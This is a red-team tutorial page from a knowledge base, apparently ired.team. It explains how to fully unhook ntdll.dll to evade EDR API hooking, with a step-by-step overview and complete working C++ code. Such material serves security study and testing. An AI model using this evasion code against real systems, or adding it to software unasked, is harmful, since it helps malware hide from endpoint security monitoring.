Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
AV Bypass with Metasploit Templates and Custom Binaries
Evading Windows Defender with 1 Byte Change
Bypassing Windows Defender: One TCP Socket Away From Meterpreter and Beacon Sessions
Bypassing Cylance and other AVs/EDRs by Unhooking Windows APIs
Windows API Hashing in Malware
Detecting Hooked Syscalls
Calling Syscalls Directly from Visual Studio to Bypass AVs/EDRs
Retrieving ntdll Syscall Stubs from Disk at Run-time
Full DLL Unhooking with C++
Enumerating RWX Protected Memory Regions for Code Injection
Disabling Windows Event Logs by Suspending EventLog Service Threads
Obfuscated Powershell Invocations
Masquerading Processes in Userland via _PEB
Commandline Obfusaction
File Smuggling with HTML and JavaScript
Timestomping
Alternate Data Streams
Hidden Files
Encode/Decode Data with Certutil
Downloading Files with Certutil
Packed Binaries
Unloading Sysmon Driver
Bypassing IDS Signatures with Simple Reverse Shells
Preventing 3rd Party DLLs from Injecting into your Malware
ProcessDynamicCodePolicy: Arbitrary Code Guard (ACG)
Parent Process ID (PPID) Spoofing
Executing C# Assemblies from Jscript and wscript with DotNetToJscript
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows / OS Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Full DLL Unhooking with C++

EDR evasion

It's possible to completely unhook any given DLL loaded in memory, by reading the .text section of ntdll.dll from disk and putting it on top of the .text section of the ntdll.dll that is mapped in memory. This may help in evading some EDR solutions that rely on userland API hooking.

Overview

The process for unhooking a DLL is as follows. Let's assume that the ntdll.dll is hooked and here is how we could unhook it:

  1. Map a fresh copy of ntdll.dll from disk to process memory

  2. Find virtual address of the .text section of the hooked ntdll.dll

    1. get ntdll.dll base address

    2. module base address + module's .text section VirtualAddress

  3. Find virtual address of the .text section of the freshly mapped ntdll.dll

  4. Get original memory protections of the hooked module's .text section

  5. Copy .text section from the freshly mapped dll to the virtual address (found in step 3) of the original (hooked) ntdll.dll - this is the meat of the unhooking as all hooked bytes get overwritten with fresh ones from the disk

  6. Apply original memory protections to the freshly unhooked .text section of the original ntdll.dll

Below is a simplified graph, illustrating the core concept of the technique, where a hooked .text section of ntdll.dll is replaced with a clean copy of .text section of ntdll.dll from disk:

Code

Below code fully unhooks the ntdll.dll, although it could be modified to unhook any other DLL.

#include "pch.h"
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>
​
int main()
{
	HANDLE process = GetCurrentProcess();
	MODULEINFO mi = {};
	HMODULE ntdllModule = GetModuleHandleA("ntdll.dll");
	
	GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
	LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
	HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
	LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);
​
	PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
	PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);
​
	for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
		PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
		
		if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
			DWORD oldProtection = 0;
			bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
			memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
			isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
		}
	}
	
	CloseHandle(process);
	CloseHandle(ntdllFile);
	CloseHandle(ntdllMapping);
	FreeLibrary(ntdllModule);
	
	return 0;
}

Note that the above code does not fix image base relocations. Although ntdll.dll does not have anything to be relocated within its .text section, it may be required when dealing with other dlls.

Thanks @mrgretzky for highlighting this.

See my notes about PE image relocations: https://ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations#relocation​

Previous
Retrieving ntdll Syscall Stubs from Disk at Run-time
Next
Enumerating RWX Protected Memory Regions for Code Injection
Last updated 10 months ago
Contents
Overview
Code